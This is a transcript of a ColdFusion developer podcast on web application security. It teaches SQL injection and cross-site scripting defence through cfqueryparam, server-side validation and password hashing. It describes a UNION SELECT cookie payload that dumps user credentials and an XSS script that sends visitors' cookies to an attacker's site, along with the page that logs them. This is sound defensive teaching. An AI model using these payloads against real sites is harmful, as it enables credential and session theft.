Welcome back to Cookies and Muse. I know it's been a long time since our last podcast, and I know you've been anxiously awaiting part four in our security series because this is the part that most of my readers actually care about. It's the part where we discuss actual code techniques, particularly in ColdFusion, for SQL injection attack and cross-site scripting, and especially how to prevent those techniques. So this is an exciting podcast, and I hope you'll stay with us. This particular podcast comes with a number of samples, and if you want the samples, you need to go to the website and go to the post, check out the post, and check out the samples on the post. We've been discussing a new paradigm, a new metaphor for dealing with security on the web, and we've been talking about replacing the idea of a vault with the idea of a pyramid from Maslow's hierarchy of self-actualization. So we've talked about border agents, meaning firewalls and devices on the outside of your network. We've talked about policing and people policy inside your network. In our last podcast, we talked about personal space, the neighborhood that your network, that your application, lives in, and how it accesses external resources within the neighborhood. Today, we're going to talk about your application's personal health. Now, this is an important topic. It's not enough just to have border agents. It's not enough just to have police and policy and access rules for external resources. It's also important that your application, your specific application, follow some rules and be safe from some of the common attacks that are out there on the web. Many of the most common and, might I say, easiest to implement attacks on the web these days are actually attacks at script code, at web applications written in ColdFusion, ASP, JSP, PHP, whatever. So this is an area where you need to educate yourself, and you need to make sure, because it's your butt on the line, you need to make sure that your code is secure. So with that in mind, we're going to start by talking about some malicious hacking techniques. Now, these techniques are used to break into your app, and we're going to discuss two of them at some detail, SQL injection attack and cross-site scripting. So get out your notepad or go to the web and take a look at the sample code there to give yourself an idea, because as we go, we're going to be talking about specific code, and I know that in a podcast, it's kind of difficult to follow. All right, let's talk about SQL injection attack. This one is actually fairly well understood on the web. I think most people who are advanced programmers in web technologies understand what this attack is and how it's used. Unfortunately, being well understood, it is not very well protected against. I would say that probably 80% of the sites that we deal with where we're given code to modify, for a new application or a change request or to optimize or whatever, is vulnerable to SQL injection attack. It's amazing how many developers simply pay virtually no attention to this issue at all. They're just expecting their site to be hardened by virtue of obscurity, I suppose. So the short description of SQL injection is user input being used to manipulate the database in ways that were not intended. The way this usually plays out is, you have a basic query that handles something that's passed in on the URL on a form, or perhaps as a cookie variable, and the developer is expecting one thing, but the user, the malicious user in this case, gives him another, and that code is passed to the SQL server or to the database engine, and it's rendered into something else, some other kind of query than the developer intended. So let's talk about a good example of it. Let's say you have an application that tracks people being logged in. Say Sally, developer, just finished her web application construction kit by Ben Forda. She's excited. She's out there. She's decided she's going to create a member section for her members on her website. So she creates a member section based on a table called users. The table has four columns in it: ID, full name, which holds a string with the user's full name, a username, which is the user's username, and password. And for the sake of argument, we're going to put in three rows into our table. ID 1, 2, and 3. Joe Smith, whose username is Joe Smith with no space, and password is Daisy. Ron Smith, whose password is Rose, and Jane Smith, whose password is Violet. So what our code does is when a user logs in, it checks the username and the password, and if it finds that the user is a valid user for our site, it sets a cookie, user ID. Then each time the user hits a page inside the member section, it goes and grabs the cookie, it sends it to the database, and it pulls back the user's name and displays in the upper left-hand corner who they are, currently logged in or welcome, Joe Smith. Cool. And Sally's very happy with herself because this is the first interactive site she's ever built, and it seems to be working splendid. Now me, I have a number 1 in my user ID because I'm Joe Smith. And so every time I hit a page in the member section, the following code runs. CFF is defined cookie.userid. Hey, I have that cookie. I have a number 1. And then it runs a query. The query's name is getUserID. And it hits my data source. And it says, select full name from users where userID equals cookie.userID. Great, cool. All right. And then in the upper left-hand corner, there's this little snippet of code that does CF output. Query equals my user. And it says, inside then it says welcome, and then in pound signs, full name. And that's how I get my name out. Sally's really proud of this, and Joe's real happy to see his name, right? Let's just say that Joe is an ornery guy. He's not so much interested in just seeing what Sally has done. He's interested in maybe seeing if he can get in as other people and see what other people are up to. So his goal is to get out the usernames and the passwords from this site. And let's just say he's a clever guy, and he knows that a lot of developers choose the table name of users, and he knows that a lot of developers choose the column name of username and full name and password. So he's got a good idea of what the columns are, and so he's got to come up with a way, because he knows about his cookie, to crack this database and get the information out that he wants to. So he prepares a cookie that is looks like this. It says 1, followed by a return, and then the word union, followed by a return, and then select username plus password as name from users, and that's his cookie that he's going to pass in. Now, when he passes this cookie in, the resulting code is select full name from users where user ID equals 1, union, select username plus password as name from users. The result of that is going to be a query that pulls back his name as one of the character values, and then a bunch of strings representing every user in the database, that is username and password of every user in the database. And because the developer has so helpfully used the query attribute of the output tag when she, Sally in this case, chose to display welcome Joe Smith, all of those users are going to line up in a nice little column, and he can copy them right out into an Excel spreadsheet and start logging in as different people and seeing what's up. Now, why does this work the way it does? What's the deal here? Why doesn't the database know that cookie is supposed to be an int? Well, it doesn't know because what's happening under the covers in CF Query is that a string, whatever's between the two CF Query tags, the start and the end tag, a string is being built and passed to the prepare statement of SQL. And it's preparing a new SQL statement and making sure that it's valid SQL syntax, and then passing it to the database. So any valid SQL syntax is going to work here. And what the user cleverly has created valid SQL syntax. Now, a couple of things that make SQL injection harder to do. One of them is if the values that you're passing in are character values, they have to be in single quotes. And because ColdFusion escapes single quotes, when the user passes in items in single quotes, it's very difficult to get the order right to trick ColdFusion into treating a single quote as if it were the end of a string so that your next set of words actually counts as valid SQL. So that can make it difficult, but the truth is that a lot of sites use numbers. IDs are really easy, they're fast, they're small, they don't take up a lot of room, so they tend to be used quite frequently, and as the storage mechanism on the URL or whatever for rows in the database as the primary key. And because of that, if they're not protected, they are tend to be prepared by the SQL prepare statement as a valid SQL string if there's any valid SQL that follows the number. So one other thing I would mention about that, we've been on a lot of sites, I mean a lot of sites, that actually use a technique of creating and concatenating a long string. And this may be because they come from the Java world or ASP or whatever, but they build their SQL string as a long string and then pass it to the query tag. The problem with that is that CF query, again, escapes single quotes. And when it does that, it breaks whatever string they've concatenated. But there's a workaround to that. It's a function called preserve single quotes. What it does is it says, keep the string intact. Whatever I've decided to put together, keep it intact. Don't escape the single quotes. Well, when you use preserve single quotes, your site is unusually vulnerable to SQL injection attack. It means that any query, virtually any query that uses that technique, can be manipulated by a hacker. If any part of the form input is from him and is not scrubbed, he can definitely get in there, he or she can definitely get in there and hack your query. So preserve single quotes is one of those techniques that should be used very sparingly. And whenever you use it, make sure that you've got a function that strips out SQL syntax from any user input and gets rid of it and lets it go so that the user input is correctly validated. All right, so what's the fix? Well, the fix in general is the tag in Colfusion, cfqueryparam. If you are using cfqueryparam around all of your user input variables, then you are not vulnerable to SQL injection attack. I'm going to say that again. If you are using cfqueryparam around all your user input variables, then you are not vulnerable to SQL injection attack. Why is that? Well, because cfqueryparam, rather than passing your form variable to the SQL prepare statement, it creates a placeholder for it as a variable of type. It says select from users, full name from users, where user ID equals, and instead of a 1, it's going to put there a variable that is of the type integer. So it's going to be where user ID equals some integer to be determined. Okay, and then it passes the variable in a separate block as a set of variables. That are an array of variables that are passed and by type. So that binding of the type to the variable inside of the SQL statement means that no matter what you pass in there, SQL is going to try to treat it as that type, and it's not going to try to parse it as SQL code. That's why cfqueryparam is an effective tool against SQL injection. You must keep in mind too that this data binding helps you take advantage of advanced features on your database platform. In SQL Server, for example, cfqueryparam allows you to take advantage of server-side caching of execution plans, which can increase your queries somewhat dramatically, in some cases as much as 30 to 50% of its very complex queries. Because one of the tasks the SQL Server has to do when you pass it just a string and say, here's some SQL, is it has to come up with an execution plan. And the first place it looks is in its own cache of execution plans. Is there something that matches this? If you're not using variables, then if you're not using the binding technique of cfqueryparam, then the matching almost never takes place. Because unless you're running the same query twice in succession, the execution plan just simply is never going to be found. But when you're using binding, it allows you to create what is virtually a template for a query, and the variables can be, well, variable. and the template can be cached and be used over and over again by the database. That's why Safe Query Parameter can be markedly faster than just passing in the strings. The only downside to Safe Query Param is that when you use it, you're not able to use the cached within or cache after attributes of the CF query tag. In other words, you can't use Cold Fusion query caching. So you have to get around that by, if you're going to use query caching, you must scrub your variables. You must create a function. There's one on cflib.org that extracts SQL code out of a statement that's sent in by the user, out of any user input, and make sure your string's safe to be passed to your query. So that's the deal on CF query param. Let's talk about another attack that's often mentioned, and that is cross-site scripting. Now, the cross-site scripting attack is even less understood than SQL injection. In fact, it's probably maybe the least understood attack of all, at least I think it is. It's the idea behind cross-site scripting, which is often talked about in an acronym, XSS, is to manipulate a user in a secret way, in a clandestine way, and to trap his or her data. XSS requires the ability of the hacker to get unfiltered content onto the page somehow. Now, that doesn't sound terribly likely. Oh, yeah, my hacker. You know, a hacker, he can't get stuff onto the page. No way, he can't do it. Well, consider the example of a community site. Let's say you have a directory. People sign up, they put in their username, they put in their description of themselves. You have now allowed them, and you display it somewhere for others to see. Maybe a little search engine, I'm looking for, you know, a tall, dark, handsome stranger. And you allow people to see their profile. And the profile consists of text of input that they themselves have given you. What can be done if I can get stuff onto the page? Well, think for a moment about just a little HTML and a little JavaScript. What can you do with just a little HTML and a little JavaScript? Okay, let's say I'm a user. My name is Grimaldo Smarts Grammar. And I come onto your dating site and I enter the following description. I'm a stunning blonde, I'm 5'2", 280 pounds, soaking wet, which I often am. I have big eyes and a good personality. I like sitting, eating, and watching TV. Now, besides the fact that this is sort of a niche description on a dating site and takes a certain appetite to contact this person, let's also suppose that Grimaldo is really named Rodney, and he's a teenager in the 10th grade, and he's just cutting his teeth on writing JavaScript. He might try embedding at the bottom of his description the following code. In between script tags, he might embed a string variable, http, you know, rodneysworld.com/transparent.cfm, ?, cookie equals document dot cookie, and then document dot write, image source equals, and then that URL. What he's done is embedded an image tag onto the page, and the image tag points to transparent.cfm, and when it calls transparent.cfm, it's going to pass whatever's in the cookies, or whatever's in the cookie values of whoever's viewing his profile, whoever that might be. Now, on Rodney's world, Rodney creates transparent.cfm, and this page has code like this. CFF is defined url.cookie, insert into, you know, cookies, and then the value of url.cookie. And then CF content type equals image gif, and file equals transparent gif. What's the end result? What happens when Rodney does this? Well, every time somebody sees Grimaldo's profile, a transparent image is embedded on the page, and the contents of their cookies on that domain will be logged into Rodney's cookie table. He could even potentially find the session IDs and use them for session hijacking on the fly. You can see how easy it would be to do all sorts of things. Anything that JavaScript can do is now possible. Change the style sheet, change the background image to one of your dog. You know, insert a form on the page asking for them to change their password. Pop up an ad. embed your ad in the page and replace the ad that was there. Use href.location to simply redirect the user to your own site. All of these things would be possible. Anything that's doable with JavaScript would be possible. What's the solution? Well, the solution is the same, amazingly. Validate user input when a user is giving you information. Validate output when the source of the output comes from a user. Validate anything that is not directly in your control. If you allow users to insert HTML, the content should be scrubbed for tags that you don't allow, like script, for example. That is the solution to both of these issues. Now, at this point, it might be a good idea to talk about AJAX. You can't blow your nose in the web community these days without stumbling up against AJAX. And by the way, just today, Adobe released a new AJAX toolkit called Spry. It looks very promising. So AJAX is a really cool thing. It allows for you to manipulate data on your server without sending a user in the old-fashioned way from page to page to page. Very promising. Just remember, when you use AJAX, you're opening up your handler code in ways that a simple form post doesn't really open it up. With AJAX, you're posting an XML document to the handler and making choices based on the data. And that's still another hole that can be used by an attacker. Add to that, most AJAX handlers, form handlers, are basically multifunction form handlers. They handle form values based on whatever XML is coming down the pipe, and that can change based on user interaction. So the AJAX hole is a bigger hole than a typical form post hole. And it's even bigger for the fact that it's only lightly understood at this point. So as in all cases, validate input on the server. I think I'll write a song called Validate on the Server with one of those catchy tunes that you can't get out of your head, and you can write me nasty messages saying, why did you put that song in my head? Okay, the two attacks we've mentioned are the easiest to master by far. They represent the greatest risk from those who believe themselves to be computer geniuses because they've, you know, mastered Doom 3. Other forms of attack are out there, but they require an increasing level of sophistication. You go up from here, it takes more and more sophistication to make things happen. One of those attacks that I often ask about, because I've blogged about it several times, is email injection attack. Email injection is pretty easy to implement, but it does require you to manipulate email headers and a knowledge of the email file format of SMTP. You've got to know how to create an SMTP message that can be parsed and read by an SMTP handler. It also has a limited use, that of basically spamming. And it doesn't offer the thrill of, you know, capturing data from a user. So another something I've heard about recently is HTTP request splitting. And this is a way of fooling requesting browsers using a sort of man-in-the-middle approach that manipulates the 302 direct redirect request header. And when the user thinks they're going to be sent to site A, they're actually sent to site B. Not prevalent yet, and requires a level of sophistication beyond the level of most script hackers. Certainly, it requires a level of sophistication to even get your head around it, even though it's not that difficult to figure out. So those are some of the things coming down. One other thing that I'll mention before I close is that my good friend and fellow developer, Ryan Stilley, mentioned on the blog that one of the most important security issues is do not store your passwords in clear text. If you have a mission-critical application, don't store your passwords in clear text. Find a way to encrypt them. Use the hash function. Find other ways of retrieving passwords and handling password issues. Very good advice, and you should follow it for any mission-critical application. And I say mission-critical, yes, you should consider what level of security is needed in your application before you go through all kinds of steps to secure your app. If your application is low value, if the data stored in it is low value, then I would not spend thousands of dollars, you know, encrypting all the passwords and yada yada yada. If it's an internet application and used only on the internal network, or you know, whatever, you decide what your risk factors are. But do a risk analysis before you spend thousands of dollars plugging holes, because in some cases, the data just isn't worth that much. Remember, it's your data that's at risk from hacking more than anything else. So if your data isn't worth a hill of beans, then you know, you're basically throwing good money after bad if you try to fix every hole. On the other hand, having good practices in place and following best practices doesn't really cost you more than following bad practices, okay? And so that's a good habit to get into. Sweating the details matter. They matter. Why don't folks validate on the server? Why don't they do it? It takes time. It's not fun code to write. It doesn't do anything visual. It's not cutting edge. It's the same stuff over and over again. Is numeric, is date, length, and trim, and is empty, and does contain. And I mean, you know, it's not fun stuff. And client-side validation is, you know, accomplished with canned JavaScript downloads copied from, you know, all those JavaScript sites out there. And tags like CFForm contribute to the general laziness of developers on this issue. So, you know, for some reason, developers just aren't in the habit of validating on the server. But get in the habit. You must validate on the server or you cannot claim that your code is secure. If you don't take anything else away from this post or this entire series, remember that one thing. Validate on the server. Now, there are a host of other tips, and I'll leave them for other blogs since this one has gone on for 17-18 minutes by now. SSL authentication, where to trap your requests, where to put your security checks, what kind of information should you store on the server, on the client, all important questions. And you need to ask yourself and you need to be careful and analyze your code. Anything stored on the client is a potential for exploitation. Remember that. This is the last chapter in a 5-part series. It's the most ambitious I've ever done. I hope you've enjoyed my insights and gleaned some extra ammunition in the fight. And as always, I welcome comments and additions to our discussion. I hope that you pass on the links to your friends. And I hope you someday, if you have it in your heart, click on my ads. For an excellent video on the topic of website vulnerabilities, there's a link on the post, on the blog post, to a video by Mike Anders at Google Video. That is simply excellent, and several of the items that I've discussed in this whole series have come from that video. So, this is Code Fusion News. Thanks for taking the time to listen, and I'll catch up with you later.